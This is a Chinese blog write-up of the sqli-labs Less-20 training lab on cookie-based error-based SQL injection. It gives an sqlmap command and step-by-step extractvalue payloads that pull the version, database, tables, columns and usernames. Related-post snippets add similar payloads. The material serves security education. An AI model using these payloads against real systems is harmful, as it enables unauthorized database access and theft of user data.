sqli-labs20关基于post的cookie报错注入

最新推荐文章于 2023-02-24 03:12:00 发布
最新推荐文章于 2023-02-24 03:12:00 发布
阅读量313 收藏
点赞数
分类专栏: sqli-labs靶场 文章标签: cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/111391845
版权

知识点

Cookie
Cookie指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据

Cookie,有时候也用复数形式Cookies,这种是指某些网站为了辨别用户身份,简单来说就是当您输入一次网站的用户名和密码之后,下一次就可以不需要输入。

服务器发送到用户浏览器并保存在本地的一小块数据,它会在浏览器下次向同一服务器再发起请求时被携带并发送到服务器上。通常,它用于告知网站服务器两个请求是否来自同一浏览器,如保持用户的登录状态。

$_COOKIE函数 作用:读取cookie信息

第二十关

sqlmap方法
当然这里既然是确定了是Cookie注入类型,那我们就可以使用SQLmap进行自动化注入:

python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-20/" --cookie="PHPSESSID=cbc3a5ec86e968fa6ee74f1839c2097e" –dbs

源码分析
1.读取uname传进来的cookie值
在这里插入图片描述2.uname和password同样被过滤,查询语句还是用and连接
在这里插入图片描述
3.通过uname传参获取cookie的值
存在cookie值那个变量用单引号闭合的
在这里插入图片描述手注
在这里插入图片描述所以传递payload的地方就是cookie传递的地方
注意:抓包的的时候要先转发一下,才能有cookie值
一、判断闭合字符

' and extractvalue(1,concat(0x7e,( 1),0x7e))#

在这里插入图片描述二、构造payload
1.爆版本号

' and extractvalue(1,concat(0x7e,( version()),0x7e))#

在这里插入图片描述2.爆库

' and extractvalue(1,concat(0x7e,( database()),0x7e))#

在这里插入图片描述3.爆表

' and extractvalue(1,concat(0x7e,( select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))#

在这里插入图片描述4.爆字段

' and extractvalue(1,concat(0x7e,( select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e))#

在这里插入图片描述5.爆数据

' and extractvalue(1,concat(0x7e,( select username from users limit 2,1),0x7e))#

在这里插入图片描述

24team
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLilabs的第20(HTTP请求头-Cookie)——报错注入
qq_73393033的博客
07-23 627
我们在判断闭合方式时发现,该网站会返回报错信息,又没有回显,因此适合使用报错注入。我们在cookie的后面加上一个',返回;这说明闭合方式是'。
SQL注入Cookie报错注入
studyphp123的博客
04-23 373
一、预备知识 Cookie 是由服务器端生成,发送给 User-Agent(一般是浏览器),浏览器会将 Cookie 的 key/value 保存到某个目录下的文本文件中,下次请求同一网站时就发送该 Cookie 给服务器(前提是浏览器设置为启用 cookie)。Cookie 名称和值可以由服务器端开发自定定义,对于 JSP 而言,也可以直接写入 jsessionid,这样服务器可以知道该用...
sqli-labs21基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 535
第21基于cookie报错注入 其实测试语句和20差不多,但是需要转码,转成base64再带入到cookie中,然后(base64在bp中有模块) 一、判断注入点 没转码之前 ' )and extractvalue(1,concat(0x7e,( 1),0x7e))# JyApYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLCggMSksMHg3ZSkpIyA= (这里的思想是先不用闭合点,进行转码,一点一点试出来,然后报错出1的话,就是闭合点) 二、爆库 ' )a
cookie注入原理详解
weixin_50464560的博客
07-16 6527
那我们还是围绕以下几个问题来看看cookie注入: 1.什么是cookie注入? 2.为什么要cookie注入? 3.怎样cookie注入? 1.什么是cookie注入?   ♦cookie注入的原理是:就要修改cookie的值,   ♦cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post...
cookie的注入
D1stiny的博客
04-03 181
虽然注入的位置不同,但是原理都一样 原理:通过修改密码,因为修改密码是需要通过cookie的登录名(loginname)称去修改,这就有可能出现注入漏洞。 cookie中要自己改成url编码或者加上编码标记 1.首先我们进行注入判断 2.在这里我们按照正常过程进行注入标记,键字盲注,结果不行,我们来看一下报错 这里图省事,直接看了数据库,按照正常流程应该是判断哪里被过滤了。 3.好了...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
Sql-labs 前 20 通过笔记
weixin_45619494的博客
10-06 421
输入:passwd=admin' and updatexml(1,concat(0x5e,(substr((select database()),1)),0x5e),1) --+直接用 十八 payload:3',extractvalue(1,concat(0x7e,(select database()),0x7e))) #发现 用 passwd=admin' sleep(6) --+ ,没有延迟,时间盲注可能没用。修改 0x5e 之前 的数字 为 32,63,94,125,即可获得后续内容!
(手工+sqlmap)【sqli-labs1-20】基础注入
07-10 1199
SQLsqlmap+手工
SQL注入——sqli-labs靶场闯(13~20)
m0re's blog
04-30 1317
本文目录 前言:SQL注入必须要拿下,所以继续学习并在靶场实验。 再次学习SQL注入知识,再补充一些基本知识。 注入通过在URL中修改对应的id值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜扛 来探测是否存在注入点。 ...
报错型Cookie注入自动化检测脚本检测实现
afei001
07-17 237
该脚本是在Cookie注入自动化检测脚本实现的基础上进行检测的。Cookie注入自动化检测脚本请点击。
Sqli-labs全通教程(手工注入+工具使用sqlmap)
热门推荐
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli-labs-Less-20 cookie头注入(全套题目,持续更新)
yzcn
11-21 440
Less-20 cookie头注入 **Cookie:**有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 先正常登陆: 返回了输入的name和password,并提示使用cookie注入 判断注入点,使用插件Cookie Editor修改cookie,因为第一次登陆成功,cookie的值会在数据库存放,所以我们第一次登陆成功,后面更改cookie的值进行注入
sqli-labs第二十
m0_73248913的博客
02-16 415
sqlilabs第二十cookie注入
sqli-labs Less-20(cookie注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 336
本篇文章使用的环境为sqli-labs Less-20 不懂为什么使用账户admin:admin登陆后页面没有正常返回cookie,所有我使用工具添加了一条cookie信息, 使用burp suite抓取流量包 1、修改cookie值,发现是使用单引号闭合的 此处可以看到页面存在报错信息,可以使用报错注入 2、判断字段数 通过使用order by 进行判断,发现存在3个字段 3、尝试使用联合查询(使用联合查询时,需要使前面的查询语句结果为假),判断当前页面是否有显示位 可以看到当前页面存在显示位置
sql-labs 闯 11~20
qq_44663230的博客
08-21 1418
sql-labs闯11~20
sqli-labs闯
最新发布
10-09
很高兴为您解答sqli-labs闯的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯,您可以按照以下步骤进行: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值